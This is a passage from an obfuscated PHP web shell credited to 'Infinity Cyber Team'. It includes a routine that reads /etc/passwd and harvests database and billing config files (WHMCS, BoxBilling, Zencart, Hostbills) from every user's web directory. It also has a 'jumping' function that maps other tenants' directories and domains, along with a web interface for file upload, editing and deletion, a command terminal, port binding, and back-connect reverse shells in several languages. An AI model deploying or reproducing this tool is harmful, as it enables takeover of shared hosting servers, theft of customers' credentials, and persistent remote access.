						"/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
						"/home/$user_con/public_html/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
						"/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
						"/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
						"/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
						"/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
						"/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
						"/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
						"/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
					];	
					foreach ($grab_config as $config => $nama_config) {
						$ambil_config = $func[14]($config);
						if ($ambil_config != '') {
							$file_config = $func[86]("infinity_config/$user_con-$nama_config.txt", "w");
							$func[90]($file_config, $ambil_config);
						}
					}
				}		
			}
			return "<font class='text-success'>Success get config! Click <a href='?dir=$dir/infinity_config'>Here!</a></font>";
		}
	} else {
		return "<font class='text-danger'>Can't Read /etc/passwd</font>";
	}
}

function jumping() {
	global $func;
	if ($func[12]("/etc/passwd")) {
		$i = 0;
		$passwd = $func[14]("/etc/passwd");
		$func[32]('/(.*?):x:/', $passwd, $user_jumping);
		$table = '<div class="table-responsive"><table class="table table-hover"><thead><tr><th>#</th><th>Type</th><th>User</th><th>Domain</th></tr></thead><tbody>';
		foreach ($user_jumping[1] as $user_pro_jump) {
			$user_jumping_dir = "/home/$user_pro_jump/public_html";
			if ($func[9]($user_jumping_dir)) {
				$i++;
				$type = 'R';
				if ($func[8]($user_jumping_dir)) {
					$type = 'RW';
				}
				if ($func[49]('posix_getpwuid')) {
					$domain_jump = $func[14]("/etc/named.conf");
					if ($domain_jump == '') {
						$domain = "Can't get domain";
					} else {
						$func[32]("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
						foreach ($domains_jump[1] as $dj) {
							$user_jumping_url = $func[33](@$func[36]("/etc/valiases/$dj"));
							$user_jumping_url = $user_jumping_url['name'];
							if ($user_jumping_url == $user_pro_jump) {
								$domain = $dj;
								break;
							} else {
								$domain = "Can't get domain";
							}
						}
					}
				} else {
					$domain = "Can't get domain";
				}
				$table .= "<tr><td>$i</td><td>$type</td><a href='?dir=$user_jumping_dir'><font class='text-success'>$user_pro_jump</font></a><td></td><td>$domain</td></tr>";
			}
		}
		$table .= '</tbody></table></div>';
		if ($i == 0) {
			return "<font class='text-danger'>No Jumping Found!</font>";
		}
		return $table;
	} else {
		return "<font class='text-danger'>Can't Read /etc/passwd</font>";
	}
}

$scandir = $func[21]($dir);

?>
<!doctype html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x" crossorigin="anonymous">
	<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
	<title><?= $shellName ?></title>
</head>
<body>
	<div class="container-lg">
		
		<nav class="navbar navbar-light bg-light">
			<div class="container-fluid">
				<a class="navbar-brand" href="?">
					<img src="<?= $logo ?>" alt="logo" width="30" height="24" class="d-inline-block align-text-top">
					<?= $shellName ?>
				</a>
			</div>
		</nav>
		
		<?php if (isset($_SESSION['message'])) : ?>
		<div class="alert alert-<?= $_SESSION['class'] ?> alert-dismissible fade show my-3" role="alert">
			<strong><?= $_SESSION['status'] ?>!</strong> <?= $_SESSION['message'] ?>
			<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
		</div>
		<?php endif; clear(); ?>

		<div id="tool">
			<div class="d-flex justify-content-center flex-wrap my-3">
				<a href="?" class="m-1 btn btn-outline-dark btn-sm"><i class="fa fa-home"></i> Home</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#upload" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfile" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-file-plus"></i> New File</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#newfolder" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-folder-plus"></i> New Folder</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#jumping" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-link"></i> Jumping</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#get-config" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-wrench"></i> Get Config</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#network" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-network-wired"></i> Network</a>
				<a class="m-1 btn btn-outline-dark btn-sm" data-bs-toggle="collapse" href="#terminal" role="button" aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-terminal"></i> Terminal</a>
			</div>
			
			<div class="row">
				<div class="col-md-12">
					<div class="collapse" id="upload" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								 <div class="col-md-6">
									<form action="" method="post" enctype="multipart/form-data">
										<div class="input-group">
											<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
											<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfile" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">File Name</label>
											<input type="text" class="form-control" name="filename" placeholder="infinity.txt">
										</div>
										<div class="mb-3">
											<label class="form-label">File Content</label>
											<textarea class="form-control" rows="5" name="filecontent"></textarea>
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfolder" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">Folder Name</label>
											<input type="text" class="form-control" name="foldername" placeholder="infinity">
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="network" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6 mb-3">
									<div class="mb-3">
										<p>Bind Port</p>
										<label class="form-label">Port</label>
										<input type="number" class="form-control" value="1337" id="bind-port">
									</div>
									<button class="btn btn-outline-dark" type="button" onclick="bindPort(this)">Bind</button>
								</div>
								<div class="col-md-6 mb-3">
									<div class="mb-3">
										<p>Back Connect</p>
										<label class="form-label">Host</label>
										<input type="text" class="form-control" id="bc-host">
									</div>
									<div class="mb-3">
										<label class="form-label">Port</label>
										<input type="number" class="form-control" value="1337" id="bc-port">
									</div>
									<div class="mb-3">
										<label class="form-label">With</label>
										<select name="with" id="bc-with" class="form-control">
											<option value="php">PHP</option>
											<option value="perl">Perl</option>
											<option value="python">Python</option>
											<option value="ruby">Ruby</option>
										</select>
									</div>
									<button class="btn btn-outline-dark" type="button" onclick="backConnect(this)">Back Connect</button>
								</div>
								<div class="col-md-12" id="network-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="jumping" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<div class="d-flex justify-content-center flex-wrap my-3">
										<button class="m-1 btn btn-outline-dark btn-sm" onclick="jumping(this)"><i class="fa fa-link"></i> Do Jumping</button>
									</div>
								</div>
								<div class="col-md-6" id="jumping-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="get-config" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<div class="d-flex justify-content-center flex-wrap my-3">
										<button class="m-1 btn btn-outline-dark btn-sm" onclick="getConfig(this)"><i class="fa fa-wrench"></i> Get All Config</button>
									</div>
								</div>
								<div class="col-md-6" id="config-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="terminal" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6 mb-3">
									<label class="form-label">Command</label>
									<input type="text" class="form-control" onchange="terminal(this)">
								</div>
								<div class="col-md-6">
									<div id="terminal-res"></div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="row">
			<div class="col-md-12">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-server"></i> Server Information </h5>
						<div class="table-responsive">
							<table class="table table-hover text-nowrap">
								<tr>
									<td>Operating System</td>
									<td> : <?= $uname ?></td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : <?= $uid ?>[<?= $user ?>] / <?= $gid ?>[<?= $group ?>]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : <?= $func[1]() ?></td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : <?= (!@$_SERVER["SERVER_ADDR"] ? ($func[49]("gethostbyname") ? @$func[40]($_SERVER['SERVER_NAME']) : '????') : @$_SERVER["SERVER_ADDR"]) ?></td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class="d-flex">: Total = <?= formatSize($total) ?>, Free = <?= formatSize($free) ?> [<?= $pers ?>%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <?= $dom ?></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: <?= $_SERVER['SERVER_SOFTWARE'] ?></td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <?= $show_ds ?></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: <?= rtrim($useful, ', ') ?></td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: <?= rtrim($downloader, ', ') ?></td>
								</tr>
								<tr>
									<td colspan="2">CURL : <?= $func[49]('curl_version') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | SSH2 : <?= $func[49]('ssh2_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | Magic Quotes : <?= $func[49]('get_magic_quotes_gpc') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | MySQL : <?= $func[49]('mysql_get_client_info') || $func[83]('mysqli') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | MSSQL : <?= $func[49]('mssql_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | PostgreSQL : <?= $func[49]('pg_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | Oracle : <?= $func[49]('oci_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?></td>
								</tr>
								<tr>
									<td colspan="2">Safe Mode : <?= @$func[31]('safe_mode') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?> | Open Basedir : <?= $open_b ?> | Safe Mode Exec Dir : <?= @$func[31]('safe_mode_exec_dir') ? '<font class="text-success">'. @$func[31]('safe_mode_exec_dir') .'</font>' : '<font class="text-warning">NONE</font>' ?> | Safe Mode Include Dir : <?= @$func[31]('safe_mode_include_dir') ? '<font class="text-success">'. @$func[31]('safe_mode_include_dir') .'</font>' : '<font class="text-warning">NONE</font>' ?></td>
								</tr>
							</table>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-wave-square"></i> Path </h5>
						<nav aria-label="breadcrumb" style="--bs-breadcrumb-divider: '>';">
							<ol class="breadcrumb">
								<?php
									$numDir = $func[61]($scdir);
									foreach ($scdir as $id => $pat) {
										if ($pat == '' && $id == 0) {
											echo '<li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/">/</a></li>';
											continue;
										}
										if ($pat == '') continue;
										if ($id + 1 == $numDir) {
											echo '<li class="breadcrumb-item active" aria-current="page">'.$pat.'</li>';
										} else {
											echo '<li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=';
											for ($i = 0; $i <= $id; $i++) {
												echo "$scdir[$i]";
												if ($i != $id) echo "/";
											}
											echo '">'.$pat.'</a></li>';
										}
									}
								?>
							</ol>
						</nav>
						[ <?= checkPerm($dir, perms($dir)) ?> ]
					</div>
				</div>
			</div>
			<div class="col-md-12" id="main">
				<div class="card border-dark overflow-auto">
					<div class="card-body">
						<h5><i class="fa fa-<?= $icon ?>"></i> <?= $title ?></h5>
						<?php if ($do == 'view') : ?>
							<h1>Anjing</h1>
						<?php else: ?>
							<?php if ($func[9]($dir)) : ?>
								<div class="table-responsive">
									<table class="table table-hover text-nowrap">
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
											<?php
												foreach ($scandir as $item) :
													if (!$func[6]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td>
														<?php if ($item === '..') : ?>
														<a href="?dir=<?= $func[28]($dir); ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?= $item ?></a>
														<?php elseif ($item === '.') :  ?>
														<a href="?dir=<?= $dir; ?>" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> <?= $item ?></a>
														<?php else : ?>
														<a href="?dir=<?= $dir . '/' . $item ?>" class="text-decoration-none text-dark"><i class="fa fa-folder"></i> <?= checkName($item); ?></a>
														<?php endif; ?>
													</td>
													<td><?= $func[38]($item) ?></td>
													<td class="align-middle">--</td>
													<td><?= $func[19]("Y-m-d h:i:s", $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?= $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="'.$item.'"' ?>><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" <?= $item === ".." || $item === "." ? '' : 'data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="'.$dir . '/' . $item.'"'?>><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
											<?php
												foreach ($scandir as $item) :
													if (!$func[7]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td><a onclick="getSource('<?= $dir . '/' . $item ?>', this)" data-bs-name="<?= $item ?>"><i class="fa fa-<?= geticon($item) ?>"></i> <?= checkName($item); ?></a></td>
													<td><?= checkName(($func[49]('mime_content_type') ? $func[63]($item) : $func[38]($item))) ?></td>
													<td><?= formatSize($func[10]($item)) ?></td>
													<td><?= $func[19]("Y-m-d h:i:s", $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="<?= $item ?>"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-name="<?= $item ?>" onclick="getSource('<?= $dir . '/' . $item ?>', this)"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="<?= $dir . '/' . $item ?>"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="<?= $dir . '/' . $item ?>"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
										</tbody>
									</table>
								</div>
							<?php else: ?>
								<font class="text-danger">Can't read this directory!</font>
							<?php endif; ?>
						<?php endif; ?>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						Copyright © Infinity Cyber Team <span class="float-end">Coded by <span class="text-muted">Bibib</span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="modal fade" id="renameModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="renameModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Rename</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="rename-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newname" class="col-form-label">New Name:</label>
		            <input type="text" class="form-control" name="newname" id="newname">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="chmodModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="chmodModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Change Permission</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="chmod-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newperm" class="col-form-label">New Permission:</label>
		            <input type="text" class="form-control" name="perm" id="newperm">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="deleteModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Delete</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to delete this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="delete-confirm">Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="downloadModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Download</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to download this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="download-confirm" download>Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="viewModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">View</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form action="" method="post">
		      <div class="modal-body">
		        <div class="mb-3">
	            <label for="content" class="col-form-label">Content:</label>
	            <textarea class="form-control" id="content" rows="15" name="content"></textarea>
	          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4" crossorigin="anonymous"></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var chmodModal = document.getElementById('chmodModal')
		var deleteModal = document.getElementById('deleteModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "oldname";
			document.getElementById("rename-form").appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		chmodModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var perm = button.getAttribute('data-bs-perm')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = chmodModal.querySelector('.modal-title')
			var modalBodyInput = chmodModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "filename";
			document.getElementById("chmod-form").appendChild(hiddenInput);
			
			modalBodyInput.value = perm
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = file
		})
		
		function getSource(filename, d) {
			fetch(window.location.pathname + '?do=get-source&filename=' + filename)
			.then(res => res.text())
			.then(function(data) {
				var viewModal = document.getElementById('viewModal')
				var myModal = new bootstrap.Modal(viewModal)
				var name = d.getAttribute('data-bs-name')
				var modalTitle = viewModal.querySelector('.modal-title')
				var modalContent = viewModal.querySelector('.modal-body textarea')
				var hiddenInput = document.createElement('input')
				hiddenInput.type = "hidden";
				hiddenInput.value = name;
				hiddenInput.name = "filename";
				viewModal.querySelector("form").appendChild(hiddenInput);
	
				modalTitle.textContent = 'Edit ' + name
				modalContent.value = data
				myModal.show(viewModal)
			})
		}
		
		function terminal(e) {
			var cmd = e.value;
			fetch(window.location.pathname + '?do=terminal&command=' + cmd)
			.then(res => res.text())
			.then(function(data) {
				var termRes = document.getElementById('terminal-res');
				termRes.innerHTML = data
				e.value = ''
			})
		}
		
		function jumping(e) {
			fetch(window.location.pathname + '?do=jumping')
			.then(res => res.text())
			.then(function(data) {
				var jumpRes = document.getElementById('jumping-res');
				jumpRes.innerHTML = data
			})
		}
		
		function getConfig(e) {
			fetch(window.location.pathname + '?do=get-config')
			.then(res => res.text())
			.then(function(data) {
				var confRes = document.getElementById('config-res');
				confRes.innerHTML = data
			})
		}
		
		function bindPort(e) {
			var port = document.getElementById('bind-port').value
			fetch(window.location.pathname + '?do=bind-port&port=' + port)
			.then(res => res.text())
			.then(function(data) {
				var netRes = document.getElementById('network-res');
				netRes.innerHTML = data
			})
		}
		
		function backConnect(e) {
			var host = document.getElementById('bc-host').value
			var port = document.getElementById('bc-port').value
			var within = document.getElementById('bc-with').value
			fetch(window.location.pathname + '?do=back-connect&host='+host+'&port='+port+'&with='+within)
			.then(res => res.text())
			.then(function(data) {
				var netRes = document.getElementById('network-res');
				netRes.innerHTML = data
			})
		}
		
	</script>
</body>
</html>